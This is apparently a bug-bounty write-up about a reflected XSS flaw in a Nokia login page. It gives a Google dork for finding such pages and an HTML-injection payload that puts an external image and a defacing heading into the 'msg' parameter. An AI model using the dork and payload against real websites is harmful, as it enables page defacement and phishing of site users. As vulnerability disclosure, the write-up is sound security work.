Hello, Hackers Welcome to my other write-up of Nokia Hacked with RXSS Vulnerability…

This time Nokia is my target…

I started from Google Dorks…

site:*nokia.com inurl:/login.jsp?msg=

And I discovered this url

As you can see the msg parameter says ‘Session Timed out. Please Login Again’

LOOK INTO STEPS:

  1. Simply I entered script tag into message parameter like this <script></script>
See what happened

2) I enterd this payload into messsage parameter.

<IMG%20SRC=”https://d15shllkswkct0.cloudfront.net/wp-content/blogs.dir/1/files/2011/08/nokia-hacked.png"><h1>Too%20Weak%20Security</h1>

Impact of Reflected XSS:

Attackers use phishing emails, malicious links, and other techniques to trick victims into making a request to the server. The reflected XSS malicious data is then executed in the victim’s browser.

Youtube Video: https://youtu.be/e9kpmCajTzA

Thanks for taking the time to read my write-up and share it with your friends, Like & Follow for more updates.

Follow me:

Instagram

Twitter

Facebook

LinkedIn

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Amit Kumar Biswas @Amitlt2

Amit Kumar Biswas @Amitlt2

SECURITY ANALYST | SECURITY RESEARCHER | ACK. BY APPLE, MICROSOFT, SAMSUNG, SOUNDCLOUD, ACCENTURE, TAKEAWAY & MANY MORE | R&D IN BLOCKCHAIN TECH | B.TECH IN CSE